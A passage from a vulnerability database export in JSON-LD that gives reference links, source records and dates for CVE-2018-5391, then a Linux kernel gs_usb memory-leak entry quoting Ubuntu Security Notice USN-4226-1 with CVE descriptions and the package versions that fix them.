        "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv180022"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/131"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/linuxbulletinoct2018-5142979.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/5782-security-advisory-37"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2018-14634"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10675"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14634"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2018-10675"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/vulnerabilities/mutagen-astronomy"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-1120"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10883"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-5803"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10881"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10322"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-10878"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-13405"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18208"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17805"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000026"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-17805"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-10879"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-10883"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-10322"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10879"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1092"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-10881"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1118"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000026"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-8781"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-18208"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-5344"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-1094"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-10940"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-1092"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1094"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-7757"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10940"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-5848"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-1118"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10878"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1120"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3646"
      },
      {
        "trust": 0.2,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/l1tf"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5390"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3620"
      },
      {
        "trust": 0.1,
        "url": "https://support.f5.com/csp/article/k74374841?utm_source=f5support\u0026amp;amp;utm_medium=rss"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/chetanshirke/my_ref"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=58766"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-7566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000200"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-16648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10880"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10882"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1065"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.6_release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10877"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10880"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10882"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-12232"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-3639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000200"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10877"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000204"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16648"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/ssbd"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-11506"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-5750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3658021"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1095"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-17806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-5390"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-13166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-9363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14641"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1065"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1068"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1095"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000204"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-18075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-7740"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5803"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-18232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5344"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13405"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-0861"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1130"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-10661"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10902"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8830"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7740"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4913"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.6_release_notes/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10902"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-0861"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8830"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5848"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4913"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1130"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-10661"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3742-2"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3742-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3674801"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3684891"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1027.30"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3741-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-xenial/4.4.0-133.159~14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3741-2"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135422"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5391"
      },
      {
        "db": "BID",
        "id": "105108"
      },
      {
        "db": "PACKETSTORM",
        "id": "150070"
      },
      {
        "db": "PACKETSTORM",
        "id": "150057"
      },
      {
        "db": "PACKETSTORM",
        "id": "148917"
      },
      {
        "db": "PACKETSTORM",
        "id": "149832"
      },
      {
        "db": "PACKETSTORM",
        "id": "150315"
      },
      {
        "db": "PACKETSTORM",
        "id": "150191"
      },
      {
        "db": "PACKETSTORM",
        "id": "150314"
      },
      {
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-135422"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5391"
      },
      {
        "db": "BID",
        "id": "105108"
      },
      {
        "db": "PACKETSTORM",
        "id": "150070"
      },
      {
        "db": "PACKETSTORM",
        "id": "150057"
      },
      {
        "db": "PACKETSTORM",
        "id": "148917"
      },
      {
        "db": "PACKETSTORM",
        "id": "149832"
      },
      {
        "db": "PACKETSTORM",
        "id": "150315"
      },
      {
        "db": "PACKETSTORM",
        "id": "150191"
      },
      {
        "db": "PACKETSTORM",
        "id": "150314"
      },
      {
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-09-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-135422"
      },
      {
        "date": "2018-09-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-5391"
      },
      {
        "date": "2018-08-14T00:00:00",
        "db": "BID",
        "id": "105108"
      },
      {
        "date": "2018-10-31T01:11:59",
        "db": "PACKETSTORM",
        "id": "150070"
      },
      {
        "date": "2018-10-31T01:00:50",
        "db": "PACKETSTORM",
        "id": "150057"
      },
      {
        "date": "2018-08-15T04:43:02",
        "db": "PACKETSTORM",
        "id": "148917"
      },
      {
        "date": "2018-10-17T15:42:22",
        "db": "PACKETSTORM",
        "id": "149832"
      },
      {
        "date": "2018-11-14T01:33:23",
        "db": "PACKETSTORM",
        "id": "150315"
      },
      {
        "date": "2018-11-06T21:04:13",
        "db": "PACKETSTORM",
        "id": "150191"
      },
      {
        "date": "2018-11-14T01:33:01",
        "db": "PACKETSTORM",
        "id": "150314"
      },
      {
        "date": "2018-08-15T04:42:57",
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "date": "2018-08-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      },
      {
        "date": "2018-09-06T21:29:00.363000",
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-12-28T00:00:00",
        "db": "VULHUB",
        "id": "VHN-135422"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-5391"
      },
      {
        "date": "2019-02-15T14:00:00",
        "db": "BID",
        "id": "105108"
      },
      {
        "date": "2022-12-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      },
      {
        "date": "2023-11-07T02:58:42.587000",
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Input validation error vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      }
    ],
    "trust": 0.6
  }
}

var-201911-1405
Vulnerability from variot

A memory leak in the gs_can_open() function in drivers/net/can/usb/gs_usb.c in the Linux kernel before 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering usb_submit_urb() failures, aka CID-fb5be6a7b486. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-fb5be6a7b486 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. ========================================================================= Ubuntu Security Notice USN-4226-1 January 07, 2020

linux, linux-aws, linux-aws-5.0, linux-azure, linux-gcp, linux-gke-5.0, linux-kvm, linux-oem-osp1, linux-oracle, linux-oracle-5.0, linux-raspi2 vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 19.04
  • Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux: Linux kernel - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-azure: Linux kernel for Microsoft Azure Cloud systems - linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems - linux-kvm: Linux kernel for cloud environments - linux-oracle: Linux kernel for Oracle Cloud systems - linux-raspi2: Linux kernel for Raspberry Pi 2 - linux-aws-5.0: Linux kernel for Amazon Web Services (AWS) systems - linux-gke-5.0: Linux kernel for Google Container Engine (GKE) systems - linux-oem-osp1: Linux kernel for OEM processors - linux-oracle-5.0: Linux kernel for Oracle Cloud systems

Details:

Michael Hanselmann discovered that the CIFS implementation in the Linux kernel did not sanitize paths returned by an SMB server. An attacker controlling an SMB server could use this to overwrite arbitrary files. (CVE-2019-10220)

It was discovered that a heap-based buffer overflow existed in the Marvell WiFi-Ex Driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14895, CVE-2019-14901)

It was discovered that a heap-based buffer overflow existed in the Marvell Libertas WLAN Driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14896, CVE-2019-14897)

It was discovered that the Fujitsu ES network device driver for the Linux kernel did not properly check for errors in some situations, leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2019-16231)

It was discovered that the QLogic Fibre Channel driver in the Linux kernel did not properly check for error, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-16233)

Nicolas Waisman discovered that the WiFi driver stack in the Linux kernel did not properly validate SSID lengths. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-17133)

Anthony Steinhauser discovered that the Linux kernel did not properly perform Spectre_RSB mitigations to all processors for PowerPC architecture systems in some situations. A local attacker could use this to expose sensitive information. (CVE-2019-18660)

It was discovered that the Mellanox Technologies Innova driver in the Linux kernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19045)

It was discovered that the VirtualBox guest driver implementation in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19048)

It was discovered that Geschwister Schneider USB CAN interface driver in the Linux kernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19052)

It was discovered that the netlink-based 802.11 configuration interface in the Linux kernel did not deallocate memory in certain error conditions. (CVE-2019-19055)

It was discovered that the ADIS16400 IIO IMU Driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19060)

It was discovered that the Intel OPA Gen1 Infiniband Driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19065)

It was discovered that the AMD Audio CoProcessor Driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19067)

It was discovered that the event tracing subsystem of the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19072)

It was discovered that the Cascoda CA8210 SPI 802.15.4 wireless controller driver for the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19075)

It was discovered that the AMD Display Engine Driver in the Linux kernel did not properly deallocate memory in certain error conditions. A physically proximate attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2019-19524)

It was discovered that the NXP PN533 NFC USB driver in the Linux kernel did not properly free resources after a late probe error, leading to a use- after-free vulnerability. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19526)

It was discovered that the Microchip CAN BUS Analyzer driver in the Linux kernel contained a use-after-free vulnerability on device disconnect. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19529)

It was discovered that multiple USB HID device drivers in the Linux kernel did not properly validate device metadata on attachment, leading to out-of- bounds writes. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19532)

It was discovered that the PEAK-System Technik USB driver in the Linux kernel did not properly sanitize memory before sending it to the device. A physically proximate attacker could use this to expose sensitive information (kernel memory). (CVE-2019-19534)

It was discovered that in some situations the fair scheduler in the Linux kernel did not permit a process to use its full quota time slice. A local attacker could use this to cause a denial of service. (CVE-2019-19922)

It was discovered that the binder IPC implementation in the Linux kernel did not properly perform bounds checking in some situations, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-2214)

Nicolas Waisman discovered that the Chelsio T4/T5 RDMA Driver for the Linux kernel performed DMA from a kernel stack. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-17075)

It was discovered that the DesignWare USB3 controller driver in the Linux kernel did not properly deallocate memory in some error conditions. (CVE-2019-18813)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.04: linux-image-5.0.0-1009-oracle 5.0.0-1009.14 linux-image-5.0.0-1023-aws 5.0.0-1023.26 linux-image-5.0.0-1024-kvm 5.0.0-1024.26 linux-image-5.0.0-1024-raspi2 5.0.0-1024.25 linux-image-5.0.0-1028-azure 5.0.0-1028.30 linux-image-5.0.0-1028-gcp 5.0.0-1028.29 linux-image-5.0.0-38-generic 5.0.0-38.41 linux-image-5.0.0-38-generic-lpae 5.0.0-38.41 linux-image-5.0.0-38-lowlatency 5.0.0-38.41 linux-image-aws 5.0.0.1023.25 linux-image-azure 5.0.0.1028.28 linux-image-gcp 5.0.0.1028.53 linux-image-generic 5.0.0.38.40 linux-image-generic-lpae 5.0.0.38.40 linux-image-gke 5.0.0.1028.53 linux-image-kvm 5.0.0.1024.25 linux-image-lowlatency 5.0.0.38.40 linux-image-oracle 5.0.0.1009.35 linux-image-raspi2 5.0.0.1024.22 linux-image-virtual 5.0.0.38.40

Ubuntu 18.04 LTS: linux-image-5.0.0-1009-oracle 5.0.0-1009.14~18.04.1 linux-image-5.0.0-1023-aws 5.0.0-1023.26~18.04.1 linux-image-5.0.0-1027-gke 5.0.0-1027.28~18.04.1 linux-image-5.0.0-1028-azure 5.0.0-1028.30~18.04.1 linux-image-5.0.0-1033-oem-osp1 5.0.0-1033.38 linux-image-aws-edge 5.0.0.1023.37 linux-image-azure 5.0.0.1028.39 linux-image-gke-5.0 5.0.0.1027.16 linux-image-oem-osp1 5.0.0.1033.37 linux-image-oracle-edge 5.0.0.1009.8

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4226-1 CVE-2019-10220, CVE-2019-14895, CVE-2019-14896, CVE-2019-14897, CVE-2019-14901, CVE-2019-16231, CVE-2019-16233, CVE-2019-17075, CVE-2019-17133, CVE-2019-18660, CVE-2019-18813, CVE-2019-19045, CVE-2019-19048, CVE-2019-19052, CVE-2019-19055, CVE-2019-19060, CVE-2019-19065, CVE-2019-19067, CVE-2019-19072, CVE-2019-19075, CVE-2019-19083, CVE-2019-19524, CVE-2019-19526, CVE-2019-19529, CVE-2019-19532, CVE-2019-19534, CVE-2019-19922, CVE-2019-2214

Package Information: https://launchpad.net/ubuntu/+source/linux/5.0.0-38.41 https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1023.26 https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30 https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1028.29 https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1024.26 https://launchpad.net/ubuntu/+source/linux-oracle/5.0.0-1009.14 https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1024.25 https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1023.26~18.04.1 https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30~18.04.1 https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1027.28~18.04.1 https://launchpad.net/ubuntu/+source/linux-oem-osp1/5.0.0-1033.38 https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1009.14~18.04.1

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1405",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.1"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.84"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.25"
      },
      {
        "model": "aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.3r2"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.201"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.1"
      },
      {
        "model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.10"
      },
      {
        "model": "fas\\/aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30.5r3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
